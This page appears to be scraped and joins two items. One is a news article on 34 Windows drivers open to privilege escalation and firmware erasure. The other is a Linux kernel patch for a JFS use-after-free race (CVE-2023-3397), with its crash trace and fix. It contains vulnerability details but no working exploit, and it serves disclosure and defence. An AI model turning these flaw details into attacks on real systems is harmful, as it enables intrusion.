As many as 34 unique vulnerable Windows Driver Model (WDM) and Windows Driver Frameworks (WDF) drivers could be exploited by non-privileged threat actors to gain full control of the devices and execute arbitrary code on the underlying systems.
"By exploiting the drivers, an attacker without privilege may erase/alter firmware, and/or elevate [operating system] privileges," Takahiro Haruyama, a

Endpoint Security / Malware

As many as 34 unique vulnerable Windows Driver Model (WDM) and Windows Driver Frameworks (WDF) drivers could be exploited by non-privileged threat actors to gain full control of the devices and execute arbitrary code on the underlying systems.

"By exploiting the drivers, an attacker without privilege may erase/alter firmware, and/or elevate \[operating system\] privileges," Takahiro Haruyama, a senior threat researcher at VMware Carbon Black, said.

The research expands on previous studies, such as ScrewedDrivers and POPKORN that utilized symbolic execution for automating the discovery of vulnerable drivers. It specifically focuses on drivers that contain firmware access through port I/O and memory-mapped I/O.

The names of some of the vulnerable drivers include AODDriver.sys, ComputerZ.sys, dellbios.sys, GEDevDrv.sys, GtcKmdfBs.sys, IoAccess.sys, kerneld.amd64, ngiodriver.sys, nvoclock.sys, PDFWKRNL.sys (CVE-2023-20598), RadHwMgr.sys, rtif.sys, rtport.sys, stdcdrv64.sys, and TdkLib64.sys (CVE-2023-35841).

Of the 34 drivers, six allow kernel memory access that can be abused to elevate privilege and defeat security solutions. Twelve of the drivers could be exploited to subvert security mechanisms like kernel address space layout randomization (KASLR).

Seven of the drivers, including Intel's stdcdrv64.sys, can be utilized to erase firmware in the SPI flash memory, rendering the system unbootable. Intel has since issued a fix for the problem.

VMware said it also identified WDF drivers such as WDTKernel.sys and H2OFFT64.sys that are not vulnerable in terms of access control, but can be trivially weaponized by privileged threat actors to pull off what's called a Bring Your Own Vulnerable Driver (BYOVD) attack.

The technique has been employed by various adversaries, including the North Korea-linked Lazarus Group, as a way to gain elevated privileges and disable security software running on compromised endpoints so as to evade detection.

"The current scope of the APIs/instructions targeted by the \[IDAPython script for automating static code analysis of x64 vulnerable drivers\] is narrow and only limited to firmware access," Haruyama said.

"However, it is easy to extend the code to cover other attack vectors (e.g. terminating arbitrary processes)."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Researchers Find 34 Windows Drivers Vulnerable to Full Device Takeover

A race condition occurred between the functions lmLogClose and txEnd in JFS, in the Linux Kernel, executed in different threads. This flaw allows a local attacker with normal user privileges to crash the system or leak internal kernel information.

Syzkaller reported an error "slab-use-after-free Write in txEnd".

crash report：

==================================================================
BUG: KASAN: slab-use-after-free in instrument\_atomic\_write include/linux/instrumented.h:87 \[inline\]
BUG: KASAN: slab-use-after-free in clear\_bit include/asm-generic/bitops/instrumented-atomic.h:41 \[inline\]
BUG: KASAN: slab-use-after-free in txEnd+0x2a3/0x5a0 fs/jfs/jfs\_txnmgr.c:535
Write of size 8 at addr ffff888021bee840 by task jfsCommit/130

CPU: 3 PID: 130 Comm: jfsCommit Not tainted 6.3.0-rc7-pasta #1
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
Call Trace:
 <TASK>
 \_\_dump\_stack lib/dump\_stack.c:88 \[inline\]
 dump\_stack\_lvl+0xd9/0x150 lib/dump\_stack.c:106
 print\_address\_description mm/kasan/report.c:319 \[inline\]
 print\_report+0xc1/0x5e0 mm/kasan/report.c:430
 kasan\_report+0xc0/0xf0 mm/kasan/report.c:536
 check\_region\_inline mm/kasan/generic.c:181 \[inline\]
 kasan\_check\_range+0x144/0x190 mm/kasan/generic.c:187
 instrument\_atomic\_write include/linux/instrumented.h:87 \[inline\]
 clear\_bit include/asm-generic/bitops/instrumented-atomic.h:41 \[inline\]
 txEnd+0x2a3/0x5a0 fs/jfs/jfs\_txnmgr.c:535
 txLazyCommit fs/jfs/jfs\_txnmgr.c:2679 \[inline\]
 jfs\_lazycommit+0x75f/0xb10 fs/jfs/jfs\_txnmgr.c:2727
 kthread+0x2e8/0x3a0 kernel/kthread.c:376
 ret\_from\_fork+0x1f/0x30 arch/x86/entry/entry\_64.S:308
 </TASK>

Allocated by task 86743:
 kasan\_save\_stack+0x22/0x40 mm/kasan/common.c:45
 kasan\_set\_track+0x25/0x30 mm/kasan/common.c:52
 \_\_\_\_kasan\_kmalloc mm/kasan/common.c:374 \[inline\]
 \_\_\_\_kasan\_kmalloc mm/kasan/common.c:333 \[inline\]
 \_\_kasan\_kmalloc+0xa3/0xb0 mm/kasan/common.c:383
 kmalloc include/linux/slab.h:580 \[inline\]
 kzalloc include/linux/slab.h:720 \[inline\]
 open\_inline\_log fs/jfs/jfs\_logmgr.c:1159 \[inline\]
 lmLogOpen+0x562/0x1430 fs/jfs/jfs\_logmgr.c:1069
 jfs\_mount\_rw+0x2f6/0x6d0 fs/jfs/jfs\_mount.c:257
 jfs\_fill\_super+0xa00/0xd40 fs/jfs/super.c:565
 mount\_bdev+0x351/0x410 fs/super.c:1380
 legacy\_get\_tree+0x109/0x220 fs/fs\_context.c:610
 vfs\_get\_tree+0x8d/0x350 fs/super.c:1510
 do\_new\_mount fs/namespace.c:3042 \[inline\]
 path\_mount+0x675/0x1e30 fs/namespace.c:3372
 do\_mount fs/namespace.c:3385 \[inline\]
 \_\_do\_sys\_mount fs/namespace.c:3594 \[inline\]
 \_\_se\_sys\_mount fs/namespace.c:3571 \[inline\]
 \_\_x64\_sys\_mount+0x283/0x300 fs/namespace.c:3571
 do\_syscall\_x64 arch/x86/entry/common.c:50 \[inline\]
 do\_syscall\_64+0x39/0xb0 arch/x86/entry/common.c:80
 entry\_SYSCALL\_64\_after\_hwframe+0x63/0xcd

Freed by task 16288:
 kasan\_save\_stack+0x22/0x40 mm/kasan/common.c:45
 kasan\_set\_track+0x25/0x30 mm/kasan/common.c:52
 kasan\_save\_free\_info+0x2b/0x40 mm/kasan/generic.c:521
 \_\_\_\_kasan\_slab\_free mm/kasan/common.c:236 \[inline\]
 \_\_\_\_kasan\_slab\_free+0x13b/0x1a0 mm/kasan/common.c:200
 kasan\_slab\_free include/linux/kasan.h:162 \[inline\]
 \_\_cache\_free mm/slab.c:3390 \[inline\]
 \_\_do\_kmem\_cache\_free mm/slab.c:3577 \[inline\]
 \_\_kmem\_cache\_free+0xcd/0x2c0 mm/slab.c:3584
 lmLogClose+0x595/0x720 fs/jfs/jfs\_logmgr.c:1461
 jfs\_umount+0x2ef/0x430 fs/jfs/jfs\_umount.c:114
 jfs\_put\_super+0x85/0x1d0 fs/jfs/super.c:194
 generic\_shutdown\_super+0x158/0x480 fs/super.c:500
 kill\_block\_super+0x9b/0xf0 fs/super.c:1407
 deactivate\_locked\_super+0x98/0x160 fs/super.c:331
 deactivate\_super+0xb1/0xd0 fs/super.c:362
 cleanup\_mnt+0x2ae/0x3d0 fs/namespace.c:1177
 task\_work\_run+0x168/0x260 kernel/task\_work.c:179
 resume\_user\_mode\_work include/linux/resume\_user\_mode.h:49 \[inline\]
 exit\_to\_user\_mode\_loop kernel/entry/common.c:171 \[inline\]
 exit\_to\_user\_mode\_prepare+0x210/0x240 kernel/entry/common.c:204
 \_\_syscall\_exit\_to\_user\_mode\_work kernel/entry/common.c:286 \[inline\]
 syscall\_exit\_to\_user\_mode+0x1d/0x50 kernel/entry/common.c:297
 do\_syscall\_64+0x46/0xb0 arch/x86/entry/common.c:86
 entry\_SYSCALL\_64\_after\_hwframe+0x63/0xcd

Last potentially related work creation:
 kasan\_save\_stack+0x22/0x40 mm/kasan/common.c:45
 \_\_kasan\_record\_aux\_stack+0x7b/0x90 mm/kasan/generic.c:491
 kvfree\_call\_rcu+0x70/0xad0 kernel/rcu/tree.c:3327
 neigh\_destroy+0x431/0x660 net/core/neighbour.c:941
 neigh\_release include/net/neighbour.h:449 \[inline\]
 neigh\_cleanup\_and\_release+0x1f8/0x280 net/core/neighbour.c:103
 neigh\_periodic\_work+0x60c/0xac0 net/core/neighbour.c:1025
 process\_one\_work+0x98a/0x15c0 kernel/workqueue.c:2390
 worker\_thread+0x669/0x1090 kernel/workqueue.c:2537
 kthread+0x2e8/0x3a0 kernel/kthread.c:376
 ret\_from\_fork+0x1f/0x30 arch/x86/entry/entry\_64.S:308

The buggy address belongs to the object at ffff888021bee800
 which belongs to the cache kmalloc-1k of size 1024
The buggy address is located 64 bytes inside of
 freed 1024-byte region \[ffff888021bee800, ffff888021beec00)

The buggy address belongs to the physical page:
page:ffffea000086fb80 refcount:1 mapcount:0 mapping:0000000000000000
flags: 0xfff00000000200(slab|node=0|zone=1|lastcpupid=0x7ff)
raw: 00fff00000000200 ffff888012440700 ffffea0000583ed0 ffffea0000609790
raw: 0000000000000000 ffff888021bee000 0000000100000002 0000000000000000
page dumped because: kasan: bad access detected
page\_owner tracks the page as allocated
 prep\_new\_page mm/page\_alloc.c:2553 \[inline\]
 get\_page\_from\_freelist+0x119c/0x2d40 mm/page\_alloc.c:4326
 \_\_alloc\_pages+0x1cb/0x4a0 mm/page\_alloc.c:5592
 \_\_alloc\_pages\_node include/linux/gfp.h:237 \[inline\]
 kmem\_getpages mm/slab.c:1360 \[inline\]
 cache\_grow\_begin+0x9b/0x3b0 mm/slab.c:2570
 cache\_alloc\_refill+0x27e/0x380 mm/slab.c:2943
 \_\_\_\_cache\_alloc mm/slab.c:3019 \[inline\]
 \_\_\_\_cache\_alloc mm/slab.c:3002 \[inline\]
 \_\_do\_cache\_alloc mm/slab.c:3202 \[inline\]
 slab\_alloc\_node mm/slab.c:3250 \[inline\]
 \_\_kmem\_cache\_alloc\_node+0x360/0x3f0 mm/slab.c:3541
 \_\_do\_kmalloc\_node mm/slab\_common.c:966 \[inline\]
 \_\_kmalloc+0x4e/0x190 mm/slab\_common.c:980
 kmalloc include/linux/slab.h:584 \[inline\]
 kzalloc include/linux/slab.h:720 \[inline\]
 ieee802\_11\_parse\_elems\_full+0x106/0x1320 net/mac80211/util.c:1609
 ieee802\_11\_parse\_elems\_crc.constprop.0+0x99/0xd0
 net/mac80211/ieee80211\_i.h:2265
 ieee802\_11\_parse\_elems net/mac80211/ieee80211\_i.h:2272 \[inline\]
 ieee80211\_bss\_info\_update+0x410/0xb50 net/mac80211/scan.c:212
 ieee80211\_rx\_bss\_info net/mac80211/ibss.c:1120 \[inline\]
 ieee80211\_rx\_mgmt\_probe\_beacon net/mac80211/ibss.c:1609 \[inline\]
 ieee80211\_ibss\_rx\_queued\_mgmt+0x18b2/0x2d30 net/mac80211/ibss.c:1638
 ieee80211\_iface\_process\_skb net/mac80211/iface.c:1583 \[inline\]
 ieee80211\_iface\_work+0xa47/0xd60 net/mac80211/iface.c:1637
 process\_one\_work+0x98a/0x15c0 kernel/workqueue.c:2390
 worker\_thread+0x669/0x1090 kernel/workqueue.c:2537
 kthread+0x2e8/0x3a0 kernel/kthread.c:376
 ret\_from\_fork+0x1f/0x30 arch/x86/entry/entry\_64.S:308
page last free stack trace:
 reset\_page\_owner include/linux/page\_owner.h:24 \[inline\]
 free\_pages\_prepare mm/page\_alloc.c:1454 \[inline\]
 free\_pcp\_prepare+0x4e3/0x920 mm/page\_alloc.c:1504
 free\_unref\_page\_prepare mm/page\_alloc.c:3388 \[inline\]
 free\_unref\_page+0x1d/0x4e0 mm/page\_alloc.c:3483
 slab\_destroy mm/slab.c:1613 \[inline\]
 slabs\_destroy+0x85/0xc0 mm/slab.c:1633
 \_\_cache\_free\_alien mm/slab.c:773 \[inline\]
 cache\_free\_alien mm/slab.c:789 \[inline\]
 \_\_\_cache\_free+0x203/0x3e0 mm/slab.c:3417
 qlink\_free mm/kasan/quarantine.c:168 \[inline\]
 qlist\_free\_all+0x4f/0x1a0 mm/kasan/quarantine.c:187
 kasan\_quarantine\_reduce+0x188/0x1d0 mm/kasan/quarantine.c:294
 \_\_kasan\_slab\_alloc+0x63/0x90 mm/kasan/common.c:305
 kasan\_slab\_alloc include/linux/kasan.h:186 \[inline\]
 slab\_post\_alloc\_hook mm/slab.h:769 \[inline\]
 slab\_alloc\_node mm/slab.c:3257 \[inline\]
 slab\_alloc mm/slab.c:3266 \[inline\]
 \_\_kmem\_cache\_alloc\_lru mm/slab.c:3443 \[inline\]
 kmem\_cache\_alloc+0x1bd/0x3f0 mm/slab.c:3452
 vm\_area\_alloc+0x20/0x100 kernel/fork.c:458
 mmap\_region+0x389/0x2270 mm/mmap.c:2553
 do\_mmap+0x853/0xf20 mm/mmap.c:1364
 vm\_mmap\_pgoff+0x1af/0x280 mm/util.c:542
 ksys\_mmap\_pgoff+0x41f/0x5a0 mm/mmap.c:1410
 do\_syscall\_x64 arch/x86/entry/common.c:50 \[inline\]
 do\_syscall\_64+0x39/0xb0 arch/x86/entry/common.c:80
 entry\_SYSCALL\_64\_after\_hwframe+0x63/0xcd

Memory state around the buggy address:
 ffff888021bee700: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
 ffff888021bee780: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
>_ffff888021bee800: fa fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb_
                                           ^
 ffff888021bee880: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
 ffff888021bee900: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
==================================================================

Through analysis, it was found that a race condition occurred between two
functions lmLogClose and txEnd, which were executed in different threads.
The possible sequence is as follows:

-------------------------------------------------------------------------
cpu1(free thread)        |        cpu2(use thread)
-------------------------------------------------------------------------
lmLogClose               |        txEnd
                         |        log = JFS\_SBI(tblk->sb)->log;
sbi->log = NULL;         |
kfree(log); \[1\] free log |
                         |        clear\_bit(log\_FLUSH, &log->flag); \[2\] UAF

Fix it by add a mutex lock between lmLogClose and txEnd:

Fixes: 1da177e4c3f4 ("Linux-2.6.12-rc2")
Signed-off-by: Zheng Wang <zyytlz.wz@xxxxxxx>
---
 fs/jfs/jfs\_debug.c  | 1 +
 fs/jfs/jfs\_debug.h  | 1 +
 fs/jfs/jfs\_logmgr.c | 2 ++
 fs/jfs/jfs\_txnmgr.c | 8 ++++++++
 4 files changed, 12 insertions(+)

diff --git a/fs/jfs/jfs\_debug.c b/fs/jfs/jfs\_debug.c
index 44b62b3c322e..a9c9266b222b 100644
--- a/fs/jfs/jfs\_debug.c
+++ b/fs/jfs/jfs\_debug.c
@@ -78,3 +78,4 @@ void jfs\_proc\_clean(void)
 }
 
 #endif /\* PROC\_FS\_JFS \*/
+DEFINE\_MUTEX(txEnd\_lmLogClose\_mutex);
\\ No newline at end of file
diff --git a/fs/jfs/jfs\_debug.h b/fs/jfs/jfs\_debug.h
index 48e2150c092e..25da8ee71f5e 100644
--- a/fs/jfs/jfs\_debug.h
+++ b/fs/jfs/jfs\_debug.h
@@ -107,3 +107,4 @@ int jfs\_xtstat\_proc\_show(struct seq\_file \*m, void \*v);
 #endif				/\* CONFIG\_JFS\_STATISTICS \*/
 
 #endif				/\* \_H\_JFS\_DEBUG \*/
+extern struct mutex txEnd\_lmLogClose\_mutex;
\\ No newline at end of file
diff --git a/fs/jfs/jfs\_logmgr.c b/fs/jfs/jfs\_logmgr.c
index 695415cbfe98..05c5391075db 100644
--- a/fs/jfs/jfs\_logmgr.c
+++ b/fs/jfs/jfs\_logmgr.c
@@ -1442,6 +1442,7 @@ int lmLogClose(struct super\_block \*sb)
 	jfs\_info("lmLogClose: log:0x%p", log);
 
 	mutex\_lock(&jfs\_log\_mutex);
+	mutex\_lock(&txEnd\_lmLogClose\_mutex);
 	LOG\_LOCK(log);
 	list\_del(&sbi->log\_list);
 	LOG\_UNLOCK(log);
@@ -1490,6 +1491,7 @@ int lmLogClose(struct super\_block \*sb)
 	kfree(log);
 
       out:
+	mutex\_unlock(&txEnd\_lmLogClose\_mutex);
 	mutex\_unlock(&jfs\_log\_mutex);
 	jfs\_info("lmLogClose: exit(%d)", rc);
 	return rc;
diff --git a/fs/jfs/jfs\_txnmgr.c b/fs/jfs/jfs\_txnmgr.c
index ffd4feece078..5b4351e59535 100644
--- a/fs/jfs/jfs\_txnmgr.c
+++ b/fs/jfs/jfs\_txnmgr.c
@@ -490,6 +490,7 @@ void txEnd(tid\_t tid)
 	struct jfs\_log \*log;
 
 	jfs\_info("txEnd: tid = %d", tid);
+	mutex\_lock(&txEnd\_lmLogClose\_mutex);
 	TXN\_LOCK();
 
 	/\*
@@ -500,6 +501,11 @@ void txEnd(tid\_t tid)
 
 	log = JFS\_SBI(tblk->sb)->log;
 
+	if (!log) {
+		mutex\_unlock(&txEnd\_lmLogClose\_mutex);
+		return;
+	}
+
 	/\*
 	 \* Lazy commit thread can't free this guy until we mark it UNLOCKED,
 	 \* otherwise, we would be left with a transaction that may have been
@@ -515,6 +521,7 @@ void txEnd(tid\_t tid)
 		spin\_lock\_irq(&log->gclock);	// LOGGC\_LOCK
 		tblk->flag |= tblkGC\_UNLOCKED;
 		spin\_unlock\_irq(&log->gclock);	// LOGGC\_UNLOCK
+		mutex\_unlock(&txEnd\_lmLogClose\_mutex);
 		return;
 	}
 
@@ -561,6 +568,7 @@ void txEnd(tid\_t tid)
 	 \* wakeup all waitors for a free tblock
 	 \*/
 	TXN\_WAKEUP(&TxAnchor.freewait);
+	mutex\_unlock(&txEnd\_lmLogClose\_mutex);
 }
 
 /\*
-- 
2.25.1

CVE-2023-3397: Linux Kernel: [PATCH] fs/jfs: Add a mutex named txEnd_lmLogClose_mutex to prevent a race  condition between txEnd and lmLogClose functions

Tag

#bios